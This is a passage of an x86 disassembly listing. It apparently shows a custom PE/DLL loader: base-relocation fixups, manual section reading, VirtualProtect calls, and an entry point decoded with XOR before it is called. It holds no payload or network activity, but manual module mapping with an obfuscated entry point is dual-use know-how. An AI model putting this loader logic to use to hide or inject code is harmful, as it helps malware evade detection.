mov eax, [ebp+arg_0]
locret_496B08: ; CODE XREF: sub_496AE5+1E�j
leave
retn
sub_496AE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496B0A proc near ; CODE XREF: sub_496BD7+16C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
add eax, [ebp+arg_8]
add eax, [ebp+arg_C]
mov [ebp+var_8], eax
loc_496B25: ; CODE XREF: sub_496B0A:loc_496BD0�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb locret_496BD5
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
sub eax, 8
mov [ebp+var_10], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_496B65: ; CODE XREF: sub_496B0A+8B�j
; sub_496B0A+C4�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_C]
jnb short loc_496BD0
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
and eax, 0FFFh
mov [ebp+var_24], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
sar eax, 0Ch
mov [ebp+var_1C], eax
mov eax, [ebp+var_4]
inc eax
inc eax
mov [ebp+var_4], eax
cmp [ebp+var_1C], 0
jnz short loc_496B97
jmp short loc_496B65
; ---------------------------------------------------------------------------
loc_496B97: ; CODE XREF: sub_496B0A+89�j
cmp [ebp+var_1C], 3
jz short loc_496BA7
mov ecx, 0EF000016h
call sub_499342
loc_496BA7: ; CODE XREF: sub_496B0A+91�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_14]
add eax, [ebp+var_24]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
sub ecx, [eax+34h]
mov eax, [ebp+var_20]
mov eax, [eax]
add eax, ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_20]
mov ecx, [ebp+var_18]
mov [eax], ecx
jmp short loc_496B65
; ---------------------------------------------------------------------------
loc_496BD0: ; CODE XREF: sub_496B0A+61�j
jmp loc_496B25
; ---------------------------------------------------------------------------
locret_496BD5: ; CODE XREF: sub_496B0A+21�j
leave
retn
sub_496B0A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_496BD7 proc near ; DATA XREF: sub_4971E1+C01�o
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_74 = dword ptr -74h
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 00497113 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00497128 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F498
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 7Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
and [ebp+var_4], 0
cmp [ebp+arg_10], 1
jnz loc_496F4D
mov [ebp+var_4], 1
call sub_4968A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
mov eax, [ebp+arg_C]
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov ecx, [ebp+var_24]
add ecx, [eax+3Ch]
mov [ebp+var_40], ecx
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_34]
lea eax, [ecx+eax-28h]
mov [ebp+var_28], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+34h]
mov [ebp+var_44], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+38h]
mov [ebp+var_2C], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_30], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
mov eax, [ecx+eax+40h]
mov [ebp+var_38], eax
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_496CB7
; ---------------------------------------------------------------------------
loc_496CAE: ; CODE XREF: sub_496BD7:loc_496D2A�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_496CB7: ; CODE XREF: sub_496BD7+D5�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb short loc_496D2C
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_50], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_4C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
push 0
push 0
push [ebp+var_50]
push [ebp+arg_0]
call sub_491421
lea eax, [ebp+var_48]
push eax
push 0
push 0
push [ebp+var_4C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
push [ebp+arg_0]
call sub_492177
test eax, eax
jz short loc_496D20
cmp [ebp+var_48], 0
jnz short loc_496D2A
loc_496D20: ; CODE XREF: sub_496BD7+141�j
mov ecx, 0EF00000Fh
call sub_499342
loc_496D2A: ; CODE XREF: sub_496BD7+147�j
jmp short loc_496CAE
; ---------------------------------------------------------------------------
loc_496D2C: ; CODE XREF: sub_496BD7+E6�j
mov eax, [ebp+var_40]
mov eax, [eax+34h]
cmp eax, [ebp+var_24]
jz short loc_496D4B
push [ebp+var_2C]
push [ebp+var_44]
push [ebp+var_40]
push [ebp+var_24]
call sub_496B0A
add esp, 10h
loc_496D4B: ; CODE XREF: sub_496BD7+15E�j
push 5Ch
push [ebp+arg_4]
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_496D68
mov eax, [ebp+arg_4]
mov [ebp+var_20], eax
jmp short loc_496D6F
; ---------------------------------------------------------------------------
loc_496D68: ; CODE XREF: sub_496BD7+187�j
mov eax, [ebp+var_20]
inc eax
mov [ebp+var_20], eax
loc_496D6F: ; CODE XREF: sub_496BD7+18F�j
cmp [ebp+var_30], 0
jz short loc_496D97
mov eax, [ebp+var_24]
add eax, [ebp+var_30]
mov [ebp+var_54], eax
push [ebp+var_38]
push 1
push [ebp+var_20]
push [ebp+var_40]
push [ebp+var_24]
push [ebp+var_54]
call sub_495D70
add esp, 18h
loc_496D97: ; CODE XREF: sub_496BD7+19C�j
mov eax, ds:dword_4A2954
mov [ebp+var_74], eax
cmp [ebp+var_74], 0
jz short loc_496DB8
mov eax, [ebp+var_74]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov [ebp+var_78], 1
jmp short loc_496DBC
; ---------------------------------------------------------------------------
loc_496DB8: ; CODE XREF: sub_496BD7+1CC�j
and [ebp+var_78], 0
loc_496DBC: ; CODE XREF: sub_496BD7+1DF�j
movzx eax, [ebp+var_78]
test eax, eax
jz short loc_496DFB
push offset sub_49CB0D
push ds:dword_4A27C0
push [ebp+arg_C]
push [ebp+var_20]
mov ecx, ds:dword_4A2954
call sub_49C9B1
mov eax, ds:dword_4A2954
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_496DFB
mov eax, [ebp+var_7C]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_496DFB: ; CODE XREF: sub_496BD7+1EB�j
; sub_496BD7+215�j
push [ebp+arg_4]
push [ebp+arg_C]
mov ecx, ds:dword_4A294C
call sub_49C98E
cmp ds:dword_4A2680, 2
jb loc_496F35
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
and [ebp+var_58], 0
lea eax, [ebp+var_58]
push eax
push 4
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4A27AC ; VirtualProtect
mov eax, [ebp+var_28]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_24]
lea eax, [ecx+eax+44h]
mov [ebp+var_3C], eax
jmp short loc_496E65
; ---------------------------------------------------------------------------
loc_496E5C: ; CODE XREF: sub_496BD7+32B�j
mov eax, [ebp+var_34]
add eax, 28h
mov [ebp+var_34], eax
loc_496E65: ; CODE XREF: sub_496BD7+283�j
mov eax, [ebp+var_34]
cmp eax, [ebp+var_28]
jnb loc_496F07
mov eax, [ebp+var_3C]
add eax, 8
mov [ebp+var_3C], eax
mov eax, [ebp+var_3C]
mov eax, [eax]
mov [ebp+var_60], eax
mov eax, [ebp+var_3C]
add eax, 4
mov [ebp+var_3C], eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_60]
mov [eax+24h], ecx
and [ebp+var_5C], 0
mov eax, [ebp+var_60]
and eax, 20000000h
test eax, eax
jz short loc_496EC2
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_496EB9
mov [ebp+var_5C], 40h
jmp short loc_496EC0
; ---------------------------------------------------------------------------
loc_496EB9: ; CODE XREF: sub_496BD7+2D7�j
mov [ebp+var_5C], 20h
loc_496EC0: ; CODE XREF: sub_496BD7+2E0�j
jmp short loc_496EDE
; ---------------------------------------------------------------------------
loc_496EC2: ; CODE XREF: sub_496BD7+2CB�j
mov eax, [ebp+var_60]
and eax, 80000000h
test eax, eax
jz short loc_496ED7
mov [ebp+var_5C], 4
jmp short loc_496EDE
; ---------------------------------------------------------------------------
loc_496ED7: ; CODE XREF: sub_496BD7+2F5�j
mov [ebp+var_5C], 2
loc_496EDE: ; CODE XREF: sub_496BD7:loc_496EC0�j
; sub_496BD7+2FE�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_5C]
mov eax, [ebp+var_34]
mov ecx, [ebp+var_34]
mov eax, [eax+34h]
sub eax, [ecx+0Ch]
push eax
mov eax, [ebp+var_34]
mov ecx, [ebp+var_24]
add ecx, [eax+0Ch]
push ecx
call ds:dword_4A27AC ; VirtualProtect
jmp loc_496E5C
; ---------------------------------------------------------------------------
loc_496F07: ; CODE XREF: sub_496BD7+294�j
mov eax, [ebp+var_40]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_40]
lea eax, [ecx+eax+18h]
mov [ebp+var_34], eax
lea eax, [ebp+var_58]
push eax
push [ebp+var_58]
mov eax, [ebp+var_28]
sub eax, [ebp+var_34]
cdq
push 28h
pop ecx
idiv ecx
push eax
push [ebp+var_34]
call ds:dword_4A27AC ; VirtualProtect
loc_496F35: ; CODE XREF: sub_496BD7+23C�j
and [ebp+var_4], 0
jmp short loc_496F4B
; ---------------------------------------------------------------------------
loc_496F3B: ; DATA XREF: _5:0049F4A8�o
push [ebp+var_14]
call sub_499C27
retn
; ---------------------------------------------------------------------------
loc_496F44: ; DATA XREF: _5:0049F4AC�o
mov esp, [ebp+var_18]
and [ebp+var_4], 0
loc_496F4B: ; CODE XREF: sub_496BD7+362�j
jmp short loc_496F6F
; ---------------------------------------------------------------------------
loc_496F4D: ; CODE XREF: sub_496BD7+34�j
cmp [ebp+arg_10], 0
jnz short loc_496F62
call sub_4968A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
jmp short loc_496F6F
; ---------------------------------------------------------------------------
loc_496F62: ; CODE XREF: sub_496BD7+37A�j
call sub_4968A0
mov ecx, [ebp+arg_8]
xor ecx, eax
mov [ebp+arg_8], ecx
loc_496F6F: ; CODE XREF: sub_496BD7:loc_496F4B�j
; sub_496BD7+389�j
cmp [ebp+arg_8], 0
jz loc_497115
mov eax, [ebp+arg_C]
add eax, [ebp+arg_8]
mov [ebp+var_64], eax
mov ds:dword_4A2928, 0FFFFFFFEh
mov eax, ds:dword_4A2960
mov [ebp+var_68], eax
mov [ebp+var_4], 2
pushaw
mov ds:dword_4A2960, esp
mov eax, [ebp+arg_14]
push eax
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_C]
push eax
call [ebp+var_64]
mov ds:dword_4A2928, eax
mov esp, ds:dword_4A2960
popaw
and [ebp+var_4], 0
call sub_496FCD
jmp loc_497113
sub_496BD7 endp
; =============== S U B R O U T I N E =======================================
sub_496FCD proc near ; CODE XREF: sub_496BD7+3EC�p
; DATA XREF: _5:0049F4B8�o
mov eax, [ebp-68h]
mov ds:dword_4A2960, eax
cmp dword ptr [ebp+18h], 0
jnz loc_4970F6
mov eax, ds:dword_4A294C
mov [ebp-80h], eax
cmp dword ptr [ebp-80h], 0
jz short loc_497003
mov eax, [ebp-80h]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov byte ptr [ebp-84h], 1
jmp short loc_49700A
; ---------------------------------------------------------------------------
loc_497003: ; CODE XREF: sub_496FCD+1E�j
and byte ptr [ebp-84h], 0
loc_49700A: ; CODE XREF: sub_496FCD+34�j
movzx eax, byte ptr [ebp-84h]
test eax, eax
jz short loc_497047
push dword ptr [ebp+14h]
mov ecx, ds:dword_4A294C
call sub_49C8E0
mov eax, ds:dword_4A294C
mov [ebp-88h], eax
cmp dword ptr [ebp-88h], 0
jz short loc_497047
mov eax, [ebp-88h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_497047: ; CODE XREF: sub_496FCD+46�j
; sub_496FCD+68�j
push 5Ch
push dword ptr [ebp+0Ch]
call sub_48D700
pop ecx
pop ecx
mov [ebp-6Ch], eax
cmp dword ptr [ebp-6Ch], 0
jnz short loc_497064
mov eax, [ebp+0Ch]
mov [ebp-6Ch], eax
jmp short loc_49706B
; ---------------------------------------------------------------------------
loc_497064: ; CODE XREF: sub_496FCD+8D�j
mov eax, [ebp-6Ch]
inc eax
mov [ebp-6Ch], eax
loc_49706B: ; CODE XREF: sub_496FCD+95�j
mov eax, ds:dword_4A2954
mov [ebp-8Ch], eax
cmp dword ptr [ebp-8Ch], 0
jz short loc_497098
mov eax, [ebp-8Ch]
add eax, 10h
push eax
call ds:dword_49F01C ; RtlEnterCriticalSection
mov byte ptr [ebp-90h], 1
jmp short loc_49709F
; ---------------------------------------------------------------------------
loc_497098: ; CODE XREF: sub_496FCD+B0�j
and byte ptr [ebp-90h], 0
loc_49709F: ; CODE XREF: sub_496FCD+C9�j
movzx eax, byte ptr [ebp-90h]
test eax, eax
jz short loc_4970E7
push offset sub_49CB0D
push ds:dword_4A27C0
push dword ptr [ebp-6Ch]
mov ecx, ds:dword_4A2954
call sub_49C900
mov eax, ds:dword_4A2954
mov [ebp-94h], eax
cmp dword ptr [ebp-94h], 0
jz short loc_4970E7
mov eax, [ebp-94h]
add eax, 10h
push eax
call ds:dword_49F018 ; RtlLeaveCriticalSection
loc_4970E7: ; CODE XREF: sub_496FCD+DB�j
; sub_496FCD+108�j
mov eax, [ebp+0Ch]
mov [ebp-70h], eax
push dword ptr [ebp-70h]
call sub_4993DD
pop ecx
loc_4970F6: ; CODE XREF: sub_496FCD+C�j
mov eax, ds:dword_4A2928
mov [ebp-1Ch], eax
mov ds:dword_4A2928, 0FFFFFFFEh
cmp dword ptr [ebp-1Ch], 0FFFFFFFEh
jnz short locret_497112
and dword ptr [ebp-1Ch], 0
locret_497112: ; CODE XREF: sub_496FCD+13F�j
retn
sub_496FCD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_496BD7
loc_497113: ; CODE XREF: sub_496BD7+3F1�j
jmp short loc_49711C
; ---------------------------------------------------------------------------
loc_497115: ; CODE XREF: sub_496BD7+39C�j
mov [ebp+var_1C], 1
loc_49711C: ; CODE XREF: sub_496BD7:loc_497113�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
jmp short loc_497128
; END OF FUNCTION CHUNK FOR sub_496BD7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_496BD7
loc_497128: ; CODE XREF: sub_496BD7+54E�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_496BD7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49713C proc near ; CODE XREF: sub_495DC0+23C�p
; sub_495DC0:loc_49601A�p
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_4A296C, 0
setnz al
pop ebp
retn
sub_49713C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_49714D proc near ; CODE XREF: sub_495DC0:loc_49600A�p
; sub_4971E1:loc_49805C�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 10h
loc_497153: ; CODE XREF: sub_49714D+89�j
and [ebp+var_4], 0
cmp ds:dword_4A296C, 0
jz short loc_4971D0
mov [ebp+var_8], offset dword_4A296C
loc_497167: ; CODE XREF: sub_49714D:loc_4971CE�j
mov eax, [ebp+var_8]
cmp dword ptr [eax], 0
jz short loc_4971D0
mov eax, [ebp+var_8]
mov eax, [eax]
mov [ebp+var_C], eax
push 0
push 1
mov eax, [ebp+var_C]
push dword ptr [eax]
mov eax, [ebp+var_C]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_C]
push dword ptr [eax+8]
mov eax, [ebp+var_C]
push dword ptr [eax+4]
call sub_495D70
add esp, 18h
movzx eax, al
test eax, eax
jz short loc_4971C3
mov [ebp+var_4], 1
mov eax, [ebp+var_8]
mov eax, [eax]
mov ecx, [ebp+var_8]
mov eax, [eax+10h]
mov [ecx], eax
mov eax, [ebp+var_C]
mov [ebp+var_10], eax
push [ebp+var_10]
call sub_4993DD
pop ecx
jmp short loc_4971CE
; ---------------------------------------------------------------------------
loc_4971C3: ; CODE XREF: sub_49714D+52�j
mov eax, [ebp+var_8]
mov eax, [eax]
add eax, 10h
mov [ebp+var_8], eax
loc_4971CE: ; CODE XREF: sub_49714D+74�j
jmp short loc_497167
; ---------------------------------------------------------------------------
loc_4971D0: ; CODE XREF: sub_49714D+11�j
; sub_49714D+20�j
movzx eax, [ebp+var_4]
test eax, eax
jnz loc_497153
mov al, [ebp+var_4]
leave
retn
sub_49714D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4971E1 proc near ; CODE XREF: sub_49A31F+2F�p
; sub_49BE2D+2D�p
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_10C = dword ptr -10Ch
var_104 = dword ptr -104h
var_100 = dword ptr -100h
var_FC = dword ptr -0FCh
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_F0 = dword ptr -0F0h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = byte ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00497B27 SIZE 00000058 BYTES
; FUNCTION CHUNK AT 00497B8F SIZE 000004F6 BYTES
; FUNCTION CHUNK AT 00498132 SIZE 0000000F BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F4C0
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 130h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_12C], edx
mov [ebp+var_128], ecx
or [ebp+var_3C], 0FFFFFFFFh
or [ebp+var_38], 0FFFFFFFFh
or [ebp+var_58], 0FFFFFFFFh
and [ebp+var_34], 0
and [ebp+var_30], 0
and [ebp+var_1C], 0
and [ebp+var_2C], 0
and [ebp+var_54], 0
and [ebp+var_4C], 0
and [ebp+var_50], 0
and [ebp+var_40], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
and [ebp+var_5C], 0
and [ebp+var_20], 0
push offset dword_4A2930
call ds:dword_4A26C4 ; RtlEnterCriticalSection
and [ebp+var_48], 0
mov eax, ds:dword_4A2964
mov [ebp+var_44], eax
and [ebp+var_4], 0
push [ebp+var_128]
call ds:dword_4A2718 ; GetModuleHandleA
test eax, eax
jz short loc_4972A9
push [ebp+var_128]
call ds:dword_4A275C ; LoadLibraryA
push 0FFFFFFFFh
mov [ebp+var_130], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_130]
jmp loc_498132
; ---------------------------------------------------------------------------
loc_4972A9: ; CODE XREF: sub_4971E1+9C�j
push [ebp+var_12C]
lea eax, [ebp+var_24]
push eax
push [ebp+var_128]
call sub_49681E
add esp, 0Ch
mov [ebp+var_6C], eax
cmp ds:dword_4A2964, 0
jz short loc_49732D
cmp [ebp+var_6C], 0
jz short loc_49732D
mov eax, ds:dword_4A2964
mov [ebp+var_74], eax
jmp short loc_4972F1
; ---------------------------------------------------------------------------
loc_4972DD: ; CODE XREF: sub_4971E1:loc_49732B�j
mov eax, [ebp+var_74]
mov eax, [eax+4]
mov [ebp+var_74], eax
mov eax, ds:dword_4A2968
inc eax
mov ds:dword_4A2968, eax
loc_4972F1: ; CODE XREF: sub_4971E1+FA�j
cmp [ebp+var_74], 0
jz short loc_49732D
mov eax, [ebp+var_74]
mov eax, [eax]
cmp eax, [ebp+var_6C]
jnz short loc_49732B
mov eax, ds:dword_4A2968
inc eax
mov ds:dword_4A2968, eax
push 0FFFFFFFFh
and [ebp+var_134], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_134]
jmp loc_498132
; ---------------------------------------------------------------------------
loc_49732B: ; CODE XREF: sub_4971E1+11E�j
jmp short loc_4972DD
; ---------------------------------------------------------------------------
loc_49732D: ; CODE XREF: sub_4971E1+EA�j
; sub_4971E1+F0�j ...
and ds:dword_4A2968, 0
mov eax, [ebp+var_6C]
mov [ebp+var_48], eax
lea eax, [ebp+var_48]
mov ds:dword_4A2964, eax
cmp [ebp+var_6C], 0
jnz loc_4973CE
mov eax, [ebp+var_128]
mov [ebp+var_78], eax
push [ebp+var_12C]
push 0
push [ebp+var_78]
call ds:dword_4A2758 ; LoadLibraryExA
mov [ebp+var_7C], eax
cmp [ebp+var_7C], 0
jz short loc_49738E
mov eax, [ebp+var_12C]
and eax, 2
test eax, eax
jnz short loc_4973AD
push [ebp+var_128]
push [ebp+var_7C]
call sub_496070
test eax, eax
jnz short loc_4973AD
loc_49738E: ; CODE XREF: sub_4971E1+18C�j
call ds:dword_4A2710 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4973A0
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
loc_4973A0: ; CODE XREF: sub_4971E1+1B5�j
push [ebp+var_7C]
call ds:dword_4A26E0 ; FreeLibrary
and [ebp+var_7C], 0
loc_4973AD: ; CODE XREF: sub_4971E1+199�j
; sub_4971E1+1AB�j
push 0FFFFFFFFh
mov eax, [ebp+var_7C]
mov [ebp+var_138], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_138]
jmp loc_498132
; ---------------------------------------------------------------------------
loc_4973CE: ; CODE XREF: sub_4971E1+165�j
push 0
push 0
push [ebp+var_6C]
call sub_499892
add esp, 0Ch
mov [ebp+var_28], eax
push [ebp+var_28]
call ds:dword_4A2718 ; GetModuleHandleA
mov [ebp+var_80], eax
cmp [ebp+var_80], 0
jz short loc_497413
push 0FFFFFFFFh
mov eax, [ebp+var_80]
mov [ebp+var_13C], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_13C]
jmp loc_498132
; ---------------------------------------------------------------------------
loc_497413: ; CODE XREF: sub_4971E1+20F�j
mov eax, [ebp+var_24]
mov [ebp+var_84], eax
jmp short loc_49742B
; ---------------------------------------------------------------------------
loc_49741E: ; CODE XREF: sub_4971E1:loc_49744F�j
mov eax, [ebp+var_84]
inc eax
mov [ebp+var_84], eax
loc_49742B: ; CODE XREF: sub_4971E1+23B�j
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_497451
mov eax, [ebp+var_84]
movsx eax, byte ptr [eax]
cmp eax, 2Fh
jnz short loc_49744F
mov eax, [ebp+var_84]
mov byte ptr [eax], 5Ch
loc_49744F: ; CODE XREF: sub_4971E1+263�j
jmp short loc_49741E
; ---------------------------------------------------------------------------
loc_497451: ; CODE XREF: sub_4971E1+255�j
push 0
lea eax, [ebp+var_3C]
push eax
push 0
push 0
push [ebp+var_24]
call sub_491346
test eax, eax
jnz short loc_497477
cmp [ebp+var_3C], 0
jnz short loc_497477
mov ecx, 0EF00000Fh
call sub_499342
loc_497477: ; CODE XREF: sub_4971E1+284�j
; sub_4971E1+28A�j
lea eax, [ebp+var_60]
push eax
push [ebp+var_3C]
call sub_491672
push 40h
call sub_49935A
pop ecx
mov [ebp+var_F4], eax
mov eax, [ebp+var_F4]
mov [ebp+var_50], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 40h
push [ebp+var_50]
push [ebp+var_3C]
call sub_492177
test eax, eax
jz short loc_4974B9
cmp [ebp+var_64], 0
jnz short loc_4974C3
loc_4974B9: ; CODE XREF: sub_4971E1+2D0�j
mov ecx, 0EF00000Fh
call sub_499342
loc_4974C3: ; CODE XREF: sub_4971E1+2D6�j
push 0
push 0
mov eax, [ebp+var_50]
push dword ptr [eax+3Ch]
push [ebp+var_3C]
call sub_491421
push 0F8h
call sub_49935A
pop ecx
mov [ebp+var_F8], eax
mov eax, [ebp+var_F8]
mov [ebp+var_4C], eax
lea eax, [ebp+var_64]
push eax
push 0
push 0
push 0F8h
push [ebp+var_4C]
push [ebp+var_3C]
call sub_492177
test eax, eax
jz short loc_497511
cmp [ebp+var_64], 0
jnz short loc_49751B
loc_497511: ; CODE XREF: sub_4971E1+328�j
mov ecx, 0EF00000Fh
call sub_499342
loc_49751B: ; CODE XREF: sub_4971E1+32E�j
mov eax, [ebp+var_4C]
cmp dword ptr [eax], 4550h
jz short loc_497530
mov ecx, 0EF00000Ch
call sub_499342
loc_497530: ; CODE XREF: sub_4971E1+343�j
